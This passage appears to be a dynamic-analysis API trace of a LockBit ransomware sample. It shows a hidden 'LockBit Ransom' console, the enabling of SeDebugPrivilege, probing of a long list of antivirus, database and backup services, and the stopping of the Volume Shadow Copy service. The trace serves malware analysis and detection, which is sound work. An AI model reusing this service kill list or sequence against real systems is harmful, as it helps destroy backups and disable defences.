(dwMilliseconds=0x64) [0146.237] Sleep (dwMilliseconds=0x64) [0146.664] Sleep (dwMilliseconds=0x64) [0146.779] Sleep (dwMilliseconds=0x64) [0146.887] Sleep (dwMilliseconds=0x64) [0147.059] Sleep (dwMilliseconds=0x64) [0147.260] Sleep (dwMilliseconds=0x64) [0147.458] Sleep (dwMilliseconds=0x64) [0147.651] Sleep (dwMilliseconds=0x64) [0147.835] Sleep (dwMilliseconds=0x64) [0147.947] Sleep (dwMilliseconds=0x64) [0148.098] Sleep (dwMilliseconds=0x64) [0148.214] Sleep (dwMilliseconds=0x64) [0149.105] Sleep (dwMilliseconds=0x64) [0149.207] Sleep (dwMilliseconds=0x64) [0149.340] Sleep (dwMilliseconds=0x64) [0149.468] Sleep (dwMilliseconds=0x64) [0149.563] Sleep (dwMilliseconds=0x64) [0150.038] Sleep (dwMilliseconds=0x64) [0150.186] Sleep (dwMilliseconds=0x64) [0150.331] Sleep (dwMilliseconds=0x64) [0150.489] Sleep (dwMilliseconds=0x64) [0150.607] Sleep (dwMilliseconds=0x64) [0150.702] Sleep (dwMilliseconds=0x64) [0150.833] Sleep (dwMilliseconds=0x64) [0151.456] Sleep (dwMilliseconds=0x64) [0151.627] Sleep (dwMilliseconds=0x64) [0151.746] Sleep (dwMilliseconds=0x64) [0151.890] Sleep (dwMilliseconds=0x64) [0152.035] Sleep (dwMilliseconds=0x64) [0152.222] Sleep (dwMilliseconds=0x64) [0152.430] Sleep (dwMilliseconds=0x64) [0152.562] Sleep (dwMilliseconds=0x64) [0152.762] Sleep (dwMilliseconds=0x64) [0152.871] Sleep (dwMilliseconds=0x64) [0153.030] Sleep (dwMilliseconds=0x64) [0153.256] Sleep (dwMilliseconds=0x64) [0153.354] Sleep (dwMilliseconds=0x64) [0153.473] Sleep (dwMilliseconds=0x64) [0153.576] Sleep (dwMilliseconds=0x64) [0153.682] Sleep (dwMilliseconds=0x64) [0153.890] Sleep (dwMilliseconds=0x64) [0154.068] Sleep (dwMilliseconds=0x64) [0154.166] Sleep (dwMilliseconds=0x64) [0154.285] Sleep (dwMilliseconds=0x64) [0154.509] Sleep (dwMilliseconds=0x64) [0154.674] Sleep (dwMilliseconds=0x64) [0154.795] Sleep (dwMilliseconds=0x64) [0154.899] Sleep (dwMilliseconds=0x64) [0155.008] Sleep (dwMilliseconds=0x64) [0155.117] Sleep (dwMilliseconds=0x64) [0155.254] Sleep (dwMilliseconds=0x64) [0155.357] Sleep (dwMilliseconds=0x64) [0155.460] Sleep (dwMilliseconds=0x64) [0155.570] Sleep (dwMilliseconds=0x64) [0155.679] Sleep (dwMilliseconds=0x64) [0155.788] Sleep (dwMilliseconds=0x64) [0155.898] Sleep (dwMilliseconds=0x64) [0156.007] Sleep (dwMilliseconds=0x64) [0156.119] Sleep (dwMilliseconds=0x64) [0156.226] Sleep (dwMilliseconds=0x64) [0156.377] Sleep (dwMilliseconds=0x64) [0156.909] Sleep (dwMilliseconds=0x64) [0157.012] Sleep (dwMilliseconds=0x64) [0157.114] Sleep (dwMilliseconds=0x64) [0157.227] Sleep (dwMilliseconds=0x64) [0157.333] Sleep (dwMilliseconds=0x64) [0157.826] Sleep (dwMilliseconds=0x64) [0157.968] Sleep (dwMilliseconds=0x64) [0158.066] Sleep (dwMilliseconds=0x64) [0158.175] Sleep (dwMilliseconds=0x64) [0158.284] Sleep (dwMilliseconds=0x64) [0158.394] Sleep (dwMilliseconds=0x64) [0158.503] Sleep (dwMilliseconds=0x64) [0158.670] Sleep (dwMilliseconds=0x64) [0158.771] Sleep (dwMilliseconds=0x64) [0158.981] Sleep (dwMilliseconds=0x64) [0159.126] Sleep (dwMilliseconds=0x64) [0159.306] Sleep (dwMilliseconds=0x64) [0159.455] Sleep (dwMilliseconds=0x64) [0159.974] Sleep (dwMilliseconds=0x64) [0160.208] Sleep (dwMilliseconds=0x64) [0160.335] Sleep (dwMilliseconds=0x64) [0160.448] Sleep (dwMilliseconds=0x64) [0160.709] Sleep (dwMilliseconds=0x64) [0160.817] Sleep (dwMilliseconds=0x64) [0161.121] Sleep (dwMilliseconds=0x64) [0161.224] Sleep (dwMilliseconds=0x64) [0161.328] Sleep (dwMilliseconds=0x64) [0161.435] Sleep (dwMilliseconds=0x64) [0161.546] Sleep (dwMilliseconds=0x64) [0161.671] Sleep (dwMilliseconds=0x64) [0161.894] Sleep (dwMilliseconds=0x64) [0162.008] Sleep (dwMilliseconds=0x64) [0162.142] Sleep (dwMilliseconds=0x64) [0162.273] Sleep (dwMilliseconds=0x64) [0162.423] Sleep (dwMilliseconds=0x64) [0162.641] Sleep (dwMilliseconds=0x64) [0162.868] Sleep (dwMilliseconds=0x64) [0163.136] Sleep (dwMilliseconds=0x64) [0163.676] Sleep (dwMilliseconds=0x64) [0163.775] Sleep (dwMilliseconds=0x64) [0164.072] Sleep (dwMilliseconds=0x64) [0164.181] Sleep (dwMilliseconds=0x64) [0164.312] Sleep (dwMilliseconds=0x64) [0164.492] Sleep (dwMilliseconds=0x64) [0164.595] Sleep (dwMilliseconds=0x64) [0164.696] Sleep (dwMilliseconds=0x64) [0164.807] Sleep (dwMilliseconds=0x64) [0165.098] Sleep (dwMilliseconds=0x64) [0165.238] Sleep (dwMilliseconds=0x64) [0165.369] Sleep (dwMilliseconds=0x64) [0165.478] Sleep (dwMilliseconds=0x64) [0165.593] Sleep (dwMilliseconds=0x64) [0166.255] Sleep (dwMilliseconds=0x64) [0166.350] Sleep (dwMilliseconds=0x64) [0166.475] Sleep (dwMilliseconds=0x64) [0166.619] Sleep (dwMilliseconds=0x64) [0166.726] Sleep (dwMilliseconds=0x64) [0167.165] Sleep (dwMilliseconds=0x64) [0167.279] Sleep (dwMilliseconds=0x64) [0167.461] Sleep (dwMilliseconds=0x64) [0167.599] Sleep (dwMilliseconds=0x64) [0167.714] Sleep (dwMilliseconds=0x64) [0167.922] Sleep (dwMilliseconds=0x64) [0168.067] Sleep (dwMilliseconds=0x64) [0168.254] Sleep (dwMilliseconds=0x64) [0168.366] Sleep (dwMilliseconds=0x64) [0168.483] Sleep (dwMilliseconds=0x64) [0168.608] Sleep (dwMilliseconds=0x64) [0168.758] Sleep (dwMilliseconds=0x64) [0169.049] Sleep (dwMilliseconds=0x64) [0169.159] Sleep (dwMilliseconds=0x64) [0169.412] Sleep (dwMilliseconds=0x64) [0169.658] Sleep (dwMilliseconds=0x64) [0169.765] Sleep (dwMilliseconds=0x64) [0169.875] Sleep (dwMilliseconds=0x64) [0169.986] Sleep (dwMilliseconds=0x64) [0170.093] Sleep (dwMilliseconds=0x64) [0170.202] Sleep (dwMilliseconds=0x64) [0170.326] Sleep (dwMilliseconds=0x64) [0170.421] Sleep (dwMilliseconds=0x64) [0170.530] Sleep (dwMilliseconds=0x64) [0170.993] Sleep (dwMilliseconds=0x64) [0171.091] Sleep (dwMilliseconds=0x64) [0171.201] Sleep (dwMilliseconds=0x64) [0171.310] Sleep (dwMilliseconds=0x64) [0171.420] Sleep (dwMilliseconds=0x64) [0171.535] Sleep (dwMilliseconds=0x64) [0171.654] Sleep (dwMilliseconds=0x64) [0171.762] Sleep (dwMilliseconds=0x64) [0171.871] Sleep (dwMilliseconds=0x64) [0171.981] Sleep (dwMilliseconds=0x64) [0172.092] Sleep (dwMilliseconds=0x64) [0172.199] Sleep (dwMilliseconds=0x64) [0172.310] Sleep (dwMilliseconds=0x64) [0172.418] Sleep (dwMilliseconds=0x64) [0172.535] Sleep (dwMilliseconds=0x64) [0172.636] Sleep (dwMilliseconds=0x64) [0172.746] Sleep (dwMilliseconds=0x64) [0172.854] Sleep (dwMilliseconds=0x64) [0173.104] Sleep (dwMilliseconds=0x64) [0173.339] Sleep (dwMilliseconds=0x64) [0173.507] Sleep (dwMilliseconds=0x64) [0173.660] Sleep (dwMilliseconds=0x64) [0173.765] Sleep (dwMilliseconds=0x64) [0173.960] Sleep (dwMilliseconds=0x64) [0174.340] Sleep (dwMilliseconds=0x64) [0174.530] Sleep (dwMilliseconds=0x64) [0174.767] Sleep (dwMilliseconds=0x64) [0174.943] Sleep (dwMilliseconds=0x64) [0175.047] Sleep (dwMilliseconds=0x64) [0175.154] Sleep (dwMilliseconds=0x64) [0175.325] Sleep (dwMilliseconds=0x64) [0175.460] Sleep (dwMilliseconds=0x64) [0175.572] Sleep (dwMilliseconds=0x64) [0175.688] Sleep (dwMilliseconds=0x64) [0175.787] Sleep (dwMilliseconds=0x64) [0175.921] Sleep (dwMilliseconds=0x64) [0176.032] Sleep (dwMilliseconds=0x64) [0176.162] Sleep (dwMilliseconds=0x64) [0176.278] Sleep (dwMilliseconds=0x64) [0176.418] Sleep (dwMilliseconds=0x64) [0176.533] Sleep (dwMilliseconds=0x64) [0176.682] Sleep (dwMilliseconds=0x64) [0177.079] Sleep (dwMilliseconds=0x64) [0177.176] Sleep (dwMilliseconds=0x64) [0177.382] Sleep (dwMilliseconds=0x64) [0177.493] Sleep (dwMilliseconds=0x64) [0177.627] Sleep (dwMilliseconds=0x64) [0177.743] Sleep (dwMilliseconds=0x64) [0177.847] Sleep (dwMilliseconds=0x64) [0177.956] Sleep (dwMilliseconds=0x64) [0178.446] Sleep (dwMilliseconds=0x64) [0178.548] Sleep (dwMilliseconds=0x64) [0178.658] Sleep (dwMilliseconds=0x64) [0178.767] Sleep (dwMilliseconds=0x64) [0178.876] Sleep (dwMilliseconds=0x64) [0178.985] Sleep (dwMilliseconds=0x64) [0179.095] Sleep (dwMilliseconds=0x64) [0179.375] Sleep (dwMilliseconds=0x64) [0179.573] Sleep (dwMilliseconds=0x64) [0179.673] Sleep (dwMilliseconds=0x64) [0179.819] Sleep (dwMilliseconds=0x64) [0179.928] Sleep (dwMilliseconds=0x64) [0180.489] Sleep (dwMilliseconds=0x64) [0180.909] Sleep (dwMilliseconds=0x64) [0181.126] Sleep (dwMilliseconds=0x64) [0182.623] Sleep (dwMilliseconds=0x64) [0182.736] Sleep (dwMilliseconds=0x64) [0183.739] Sleep (dwMilliseconds=0x64) [0184.605] Sleep (dwMilliseconds=0x64) [0185.630] Sleep (dwMilliseconds=0x64) [0185.933] Sleep (dwMilliseconds=0x64) [0187.589] Sleep (dwMilliseconds=0x64) [0190.221] Sleep (dwMilliseconds=0x64) [0190.327] Sleep (dwMilliseconds=0x64) [0190.756] Sleep (dwMilliseconds=0x64) [0191.594] Sleep (dwMilliseconds=0x64) [0192.093] Sleep (dwMilliseconds=0x64) [0193.397] Sleep (dwMilliseconds=0x64) [0193.554] Sleep (dwMilliseconds=0x64) [0193.698] Sleep (dwMilliseconds=0x64) [0193.811] Sleep (dwMilliseconds=0x64) [0194.000] Sleep (dwMilliseconds=0x64) [0194.108] Sleep (dwMilliseconds=0x64) [0194.217] Sleep (dwMilliseconds=0x64) [0194.602] Sleep (dwMilliseconds=0x64) [0194.881] Sleep (dwMilliseconds=0x64) [0194.991] Sleep (dwMilliseconds=0x64) [0195.100] Sleep (dwMilliseconds=0x64) [0195.210] Sleep (dwMilliseconds=0x64) [0195.323] Sleep (dwMilliseconds=0x64) [0195.516] Sleep (dwMilliseconds=0x64) [0195.678] Sleep (dwMilliseconds=0x64) [0195.795] Sleep (dwMilliseconds=0x64) [0195.955] Sleep (dwMilliseconds=0x64) [0196.051] Sleep (dwMilliseconds=0x64) [0196.201] Sleep (dwMilliseconds=0x64) [0196.370] Sleep (dwMilliseconds=0x64) [0196.472] Sleep (dwMilliseconds=0x64) [0196.605] Sleep (dwMilliseconds=0x64) [0196.744] Sleep (dwMilliseconds=0x64) [0196.847] Sleep (dwMilliseconds=0x64) [0196.962] Sleep (dwMilliseconds=0x64) [0197.070] Sleep (dwMilliseconds=0x64) [0197.219] Sleep (dwMilliseconds=0x64) [0197.317] Sleep (dwMilliseconds=0x64) [0197.428] Sleep (dwMilliseconds=0x64) [0197.534] Sleep (dwMilliseconds=0x64) [0197.737] Sleep (dwMilliseconds=0x64) [0197.850] Sleep (dwMilliseconds=0x64) [0199.064] Sleep (dwMilliseconds=0x64) [0199.224] Sleep (dwMilliseconds=0x64) [0199.328] Sleep (dwMilliseconds=0x64) [0199.470] Sleep (dwMilliseconds=0x64) [0199.605] Sleep (dwMilliseconds=0x64) [0199.702] Sleep (dwMilliseconds=0x64) [0199.819] Sleep (dwMilliseconds=0x64) [0200.001] Sleep (dwMilliseconds=0x64) [0200.107] Sleep (dwMilliseconds=0x64) [0200.224] Sleep (dwMilliseconds=0x64) [0200.326] Sleep (dwMilliseconds=0x64) [0200.871] Sleep (dwMilliseconds=0x64) [0201.012] Sleep (dwMilliseconds=0x64) [0201.134] Sleep (dwMilliseconds=0x64) [0201.246] Sleep (dwMilliseconds=0x64) [0201.391] Sleep (dwMilliseconds=0x64) [0201.496] Sleep (dwMilliseconds=0x64) [0201.606] Sleep (dwMilliseconds=0x64) [0201.715] Sleep (dwMilliseconds=0x64) [0201.837] Sleep (dwMilliseconds=0x64) [0201.952] Sleep (dwMilliseconds=0x64) [0202.057] Sleep (dwMilliseconds=0x64) [0202.182] Sleep (dwMilliseconds=0x64) [0202.291] Sleep (dwMilliseconds=0x64) [0202.406] Sleep (dwMilliseconds=0x64) [0202.510] Sleep (dwMilliseconds=0x64) [0202.619] Sleep (dwMilliseconds=0x64) [0202.733] Sleep (dwMilliseconds=0x64) [0202.837] Sleep (dwMilliseconds=0x64) [0202.956] Sleep (dwMilliseconds=0x64) [0203.086] Sleep (dwMilliseconds=0x64) [0203.221] Sleep (dwMilliseconds=0x64) [0203.335] Sleep (dwMilliseconds=0x64) [0203.435] Sleep (dwMilliseconds=0x64) [0203.540] Sleep (dwMilliseconds=0x64) [0203.820] Sleep (dwMilliseconds=0x64) [0203.961] Sleep (dwMilliseconds=0x64) [0204.096] Sleep (dwMilliseconds=0x64) [0204.200] Sleep (dwMilliseconds=0x64) [0204.304] Sleep (dwMilliseconds=0x64) [0204.413] Sleep (dwMilliseconds=0x64) [0204.530] Sleep (dwMilliseconds=0x64) [0204.631] Sleep (dwMilliseconds=0x64) [0204.790] Sleep (dwMilliseconds=0x64) [0204.948] Sleep (dwMilliseconds=0x64) [0205.062] Sleep (dwMilliseconds=0x64) [0205.521] Sleep (dwMilliseconds=0x64) [0205.663] Sleep (dwMilliseconds=0x64) [0205.773] Sleep (dwMilliseconds=0x64) [0205.880] Sleep (dwMilliseconds=0x64) [0206.081] Sleep (dwMilliseconds=0x64) [0206.176] Sleep (dwMilliseconds=0x64) [0206.285] Sleep (dwMilliseconds=0x64) [0206.398] Sleep (dwMilliseconds=0x64) [0206.504] Sleep (dwMilliseconds=0x64) [0206.613] Sleep (dwMilliseconds=0x64) [0206.722] Sleep (dwMilliseconds=0x64) [0206.831] Sleep (dwMilliseconds=0x64) [0206.941] Sleep (dwMilliseconds=0x64) [0207.050] Sleep (dwMilliseconds=0x64) [0207.159] Sleep (dwMilliseconds=0x64) [0209.338] Sleep (dwMilliseconds=0x64) [0209.441] Sleep (dwMilliseconds=0x64) [0209.547] Sleep (dwMilliseconds=0x64) [0209.670] Sleep (dwMilliseconds=0x64) [0209.768] Sleep (dwMilliseconds=0x64) [0209.873] Sleep (dwMilliseconds=0x64) [0209.982] Sleep (dwMilliseconds=0x64) [0210.118] Sleep (dwMilliseconds=0x64) [0210.269] Sleep (dwMilliseconds=0x64) [0210.372] Sleep (dwMilliseconds=0x64) [0210.482] Sleep (dwMilliseconds=0x64) Thread: id = 2 os_tid = 0x40c [0062.653] AllocConsole () returned 1 [0062.702] GetConsoleWindow () returned 0x5011c [0062.703] ShowWindow (hWnd=0x5011c, nCmdShow=0) returned 1 [0062.704] SetConsoleTitleA (lpConsoleTitle="LockBit Ransom") returned 1 [0062.727] SetConsoleCtrlHandler (HandlerRoutine=0x409b90, Add=1) returned 1 [0062.727] SetProcessShutdownParameters (dwLevel=0x0, dwFlags=0x0) returned 1 [0062.727] GetWindowLongA (hWnd=0x5011c, nIndex=-20) returned 262928 [0062.728] SetWindowLongA (hWnd=0x5011c, nIndex=-20, dwNewLong=787216) returned 262928 [0062.729] SetLayeredWindowAttributes (hwnd=0x5011c, crKey=0x0, bAlpha=0xbf, dwFlags=0x2) returned 1 [0062.737] GetSystemMenu (hWnd=0x5011c, bRevert=0) returned 0x5017f [0062.737] EnableMenuItem (hMenu=0x5017f, uIDEnableItem=0xf060, uEnable=0x3) returned 0 [0062.737] DeleteMenu (hMenu=0x5017f, uPosition=0xf060, uFlags=0x0) returned 1 [0062.737] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x71ff80 | out: lpMode=0x71ff80) returned 1 [0062.750] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1 [0062.750] RegisterHotKey (hWnd=0x0, id=1, fsModifiers=0x4, vk=0x70) returned 1 [0062.750] RegisterHotKey (hWnd=0x0, id=2, fsModifiers=0x0, vk=0x70) returned 1 [0062.750] GetMessageW (lpMsg=0x71ff54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 3 os_tid = 0x48c Thread: id = 4 os_tid = 0x7e4 [0063.553] FindFirstVolumeW (in: lpszVolumeName=0x209fd80, cchBufferLength=0x104 | out: lpszVolumeName="\\\\?\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\") returned 0x541238 [0063.554] QueryDosDeviceW (in: lpDeviceName="Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}", lpTargetPath=0x209fb78, ucchMax=0x104 | out: lpTargetPath="\\Device\\HarddiskVolume1") returned 0x19 [0063.554] malloc (_Size=0x412) returned 0x77da18 [0063.554] GetVolumePathNamesForVolumeNameW (in: lpszVolumeName="\\\\?\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\", lpszVolumePathNames=0x77da18, cchBufferLength=0x209, lpcchReturnLength=0x209fb60 | out: lpszVolumePathNames=0x77da18, lpcchReturnLength=0x209fb60) returned 1 [0063.554] GetDriveTypeW (lpRootPathName="\\\\?\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\") returned 0x3 [0063.555] free (_Block=0x77da18) [0063.555] FindNextVolumeW (in: hFindVolume=0x541238, lpszVolumeName=0x209fd80, cchBufferLength=0x104 | out: hFindVolume=0x541238, lpszVolumeName="\\\\?\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\") returned 0 [0063.555] FindVolumeClose (hFindVolume=0x541238) returned 1 [0063.555] RtlExitUserThread (Status=0x0) Thread: id = 5 os_tid = 0x304 [0063.556] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x219eb34 | out: TokenHandle=0x219eb34*=0x164) returned 0x0 [0063.556] LookupPrivilegeValueA (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x219eb2c | out: lpLuid=0x219eb2c*(LowPart=0x14, HighPart=0)) returned 1 [0063.663] NtAdjustPrivilegesToken (in: TokenHandle=0x164, DisableAllPrivileges=0, NewState=0x219eb1c, BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x0 [0063.663] CloseHandle (hObject=0x164) returned 1 [0063.663] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x540e68 [0063.664] GetTickCount () returned 0x114a738 [0063.664] OpenServiceA (hSCManager=0x540e68, lpServiceName="wrapper", dwDesiredAccess=0x2c) returned 0x0 [0063.664] GetTickCount () returned 0x114a738 [0063.664] OpenServiceA (hSCManager=0x540e68, lpServiceName="DefWatch", dwDesiredAccess=0x2c) returned 0x0 [0063.664] GetTickCount () returned 0x114a738 [0063.664] OpenServiceA (hSCManager=0x540e68, lpServiceName="ccEvtMgr", dwDesiredAccess=0x2c) returned 0x0 [0063.664] GetTickCount () returned 0x114a738 [0063.664] OpenServiceA (hSCManager=0x540e68, lpServiceName="ccSetMgr", dwDesiredAccess=0x2c) returned 0x0 [0063.665] GetTickCount () returned 0x114a738 [0063.665] OpenServiceA (hSCManager=0x540e68, lpServiceName="SavRoam", dwDesiredAccess=0x2c) returned 0x0 [0063.665] GetTickCount () returned 0x114a738 [0063.665] OpenServiceA (hSCManager=0x540e68, lpServiceName="Sqlservr", dwDesiredAccess=0x2c) returned 0x0 [0063.665] GetTickCount () returned 0x114a738 [0063.665] OpenServiceA (hSCManager=0x540e68, lpServiceName="sqlagent", dwDesiredAccess=0x2c) returned 0x0 [0063.665] GetTickCount () returned 0x114a738 [0063.665] OpenServiceA (hSCManager=0x540e68, lpServiceName="sqladhlp", dwDesiredAccess=0x2c) returned 0x0 [0063.665] GetTickCount () returned 0x114a738 [0063.665] OpenServiceA (hSCManager=0x540e68, lpServiceName="Culserver", dwDesiredAccess=0x2c) returned 0x0 [0063.666] GetTickCount () returned 0x114a738 [0063.666] OpenServiceA (hSCManager=0x540e68, lpServiceName="RTVscan", dwDesiredAccess=0x2c) returned 0x0 [0063.666] GetTickCount () returned 0x114a738 [0063.666] OpenServiceA (hSCManager=0x540e68, lpServiceName="sqlbrowser", dwDesiredAccess=0x2c) returned 0x0 [0063.666] GetTickCount () returned 0x114a738 [0063.666] OpenServiceA (hSCManager=0x540e68, lpServiceName="SQLADHLP", dwDesiredAccess=0x2c) returned 0x0 [0063.666] GetTickCount () returned 0x114a738 [0063.666] OpenServiceA (hSCManager=0x540e68, lpServiceName="QBIDPService", dwDesiredAccess=0x2c) returned 0x0 [0063.666] GetTickCount () returned 0x114a738 [0063.666] OpenServiceA (hSCManager=0x540e68, lpServiceName="Intuit.QuickBooks.FCS", dwDesiredAccess=0x2c) returned 0x0 [0063.666] GetTickCount () returned 0x114a738 [0063.667] OpenServiceA (hSCManager=0x540e68, lpServiceName="QBCFMonitorService", dwDesiredAccess=0x2c) returned 0x0 [0063.667] GetTickCount () returned 0x114a738 [0063.667] OpenServiceA (hSCManager=0x540e68, lpServiceName="sqlwriter", dwDesiredAccess=0x2c) returned 0x0 [0063.667] GetTickCount () returned 0x114a738 [0063.667] OpenServiceA (hSCManager=0x540e68, lpServiceName="msmdsrv", dwDesiredAccess=0x2c) returned 0x0 [0063.667] GetTickCount () returned 0x114a738 [0063.667] OpenServiceA (hSCManager=0x540e68, lpServiceName="tomcat6", dwDesiredAccess=0x2c) returned 0x0 [0063.667] GetTickCount () returned 0x114a738 [0063.667] OpenServiceA (hSCManager=0x540e68, lpServiceName="zhudongfangyu", dwDesiredAccess=0x2c) returned 0x0 [0063.667] GetTickCount () returned 0x114a738 [0063.667] OpenServiceA (hSCManager=0x540e68, lpServiceName="vmware-usbarbitator64", dwDesiredAccess=0x2c) returned 0x0 [0063.668] GetTickCount () returned 0x114a738 [0063.668] OpenServiceA (hSCManager=0x540e68, lpServiceName="vmware-converter", dwDesiredAccess=0x2c) returned 0x0 [0063.668] GetTickCount () returned 0x114a738 [0063.668] OpenServiceA (hSCManager=0x540e68, lpServiceName="dbsrv12", dwDesiredAccess=0x2c) returned 0x0 [0063.668] GetTickCount () returned 0x114a738 [0063.668] OpenServiceA (hSCManager=0x540e68, lpServiceName="dbeng8", dwDesiredAccess=0x2c) returned 0x0 [0063.668] GetTickCount () returned 0x114a738 [0063.668] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQL$MICROSOFT##WID", dwDesiredAccess=0x2c) returned 0x0 [0063.668] GetTickCount () returned 0x114a738 [0063.668] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQL$VEEAMSQL2012", dwDesiredAccess=0x2c) returned 0x0 [0063.669] GetTickCount () returned 0x114a738 [0063.669] OpenServiceA (hSCManager=0x540e68, lpServiceName="SQLAgent$VEEAMSQL2012", dwDesiredAccess=0x2c) returned 0x0 [0063.669] GetTickCount () returned 0x114a738 [0063.669] OpenServiceA (hSCManager=0x540e68, lpServiceName="SQLBrowser", dwDesiredAccess=0x2c) returned 0x0 [0063.669] GetTickCount () returned 0x114a738 [0063.669] OpenServiceA (hSCManager=0x540e68, lpServiceName="SQLWriter", dwDesiredAccess=0x2c) returned 0x0 [0063.669] GetTickCount () returned 0x114a738 [0063.669] OpenServiceA (hSCManager=0x540e68, lpServiceName="FishbowlMySQL", dwDesiredAccess=0x2c) returned 0x0 [0063.669] GetTickCount () returned 0x114a738 [0063.669] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQL$MICROSOFT##WID", dwDesiredAccess=0x2c) returned 0x0 [0063.669] GetTickCount () returned 0x114a738 [0063.669] OpenServiceA (hSCManager=0x540e68, lpServiceName="MySQL57", dwDesiredAccess=0x2c) returned 0x0 [0063.670] GetTickCount () returned 0x114a748 [0063.670] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQL$KAV_CS_ADMIN_KIT", dwDesiredAccess=0x2c) returned 0x0 [0063.670] GetTickCount () returned 0x114a748 [0063.670] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQLServerADHelper100", dwDesiredAccess=0x2c) returned 0x0 [0063.670] GetTickCount () returned 0x114a748 [0063.670] OpenServiceA (hSCManager=0x540e68, lpServiceName="SQLAgent$KAV_CS_ADMIN_KIT", dwDesiredAccess=0x2c) returned 0x0 [0063.670] GetTickCount () returned 0x114a748 [0063.670] OpenServiceA (hSCManager=0x540e68, lpServiceName="msftesql-Exchange", dwDesiredAccess=0x2c) returned 0x0 [0063.671] GetTickCount () returned 0x114a748 [0063.671] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQL$MICROSOFT##SSEE", dwDesiredAccess=0x2c) returned 0x0 [0063.671] GetTickCount () returned 0x114a748 [0063.671] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQL$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0063.671] GetTickCount () returned 0x114a748 [0063.671] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQL$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0063.671] GetTickCount () returned 0x114a748 [0063.671] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQLFDLauncher$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0063.671] GetTickCount () returned 0x114a748 [0063.671] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQLFDLauncher$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0063.672] GetTickCount () returned 0x114a748 [0063.672] OpenServiceA (hSCManager=0x540e68, lpServiceName="SQLAgent$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0063.672] GetTickCount () returned 0x114a748 [0063.672] OpenServiceA (hSCManager=0x540e68, lpServiceName="SQLAgent$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0063.672] GetTickCount () returned 0x114a748 [0063.672] OpenServiceA (hSCManager=0x540e68, lpServiceName="QBFCService", dwDesiredAccess=0x2c) returned 0x0 [0063.672] GetTickCount () returned 0x114a748 [0063.672] OpenServiceA (hSCManager=0x540e68, lpServiceName="QBVSS", dwDesiredAccess=0x2c) returned 0x0 [0063.672] GetTickCount () returned 0x114a748 [0063.672] OpenServiceA (hSCManager=0x540e68, lpServiceName="YooBackup", dwDesiredAccess=0x2c) returned 0x0 [0063.672] GetTickCount () returned 0x114a748 [0063.672] OpenServiceA (hSCManager=0x540e68, lpServiceName="YooIT", dwDesiredAccess=0x2c) returned 0x0 [0063.673] GetTickCount () returned 0x114a748 [0063.673] OpenServiceA (hSCManager=0x540e68, lpServiceName="vss", dwDesiredAccess=0x2c) returned 0x540e18 [0063.673] QueryServiceStatusEx (in: hService=0x540e18, InfoLevel=0x0, lpBuffer=0x219f7a4, cbBufSize=0x24, pcbBytesNeeded=0x219f3b0 | out: lpBuffer=0x219f7a4, pcbBytesNeeded=0x219f3b0) returned 1 [0063.673] wvsprintfA (in: param_1=0x219e5fc, param_2="Service %s stopped", arglist=0x219eb3c | out: param_1="Service vss stopped") returned 19 [0063.673] wsprintfA (in: param_1=0x219e5fc, param_2="%s\r\n" | out: param_1="Service vss stopped\r\n") returned 21 [0063.674] GetLocalTime (in: lpSystemTime=0x219eafc | out: lpSystemTime=0x219eafc*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x2e, wMilliseconds=0x3c3)) [0063.674] wsprintfA (in: param_1=0x219e9fc, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:46] ") returned 11 [0063.674] SetThreadUILanguage (LangId=0x409) returned 0x409 [0063.674] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0063.674] WriteFile (in: hFile=0x7, lpBuffer=0x219e9fc*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x219eb28, lpOverlapped=0x0 | out: lpBuffer=0x219e9fc*, lpNumberOfBytesWritten=0x219eb28*=0xb, lpOverlapped=0x0) returned 1 [0063.674] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0063.674] WriteFile (in: hFile=0x7, lpBuffer=0x219e5fc*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x219eb28, lpOverlapped=0x0 | out: lpBuffer=0x219e5fc*, lpNumberOfBytesWritten=0x219eb28*=0x15, lpOverlapped=0x0) returned 1 [0063.675] GetConsoleWindow () returned 0x5011c [0063.675] IsWindowVisible (hWnd=0x5011c) returned 0 [0063.675] CloseServiceHandle (hSCObject=0x540e18) returned 1 [0063.676] GetTickCount () returned 0x114a748 [0063.676] OpenServiceA (hSCManager=0x540e68, lpServiceName="sql", dwDesiredAccess=0x2c) returned 0x0 [0063.676] GetTickCount () returned 0x114a748 [0063.676] OpenServiceA (hSCManager=0x540e68, lpServiceName="svc$", dwDesiredAccess=0x2c) returned 0x0 [0063.676] GetTickCount () returned 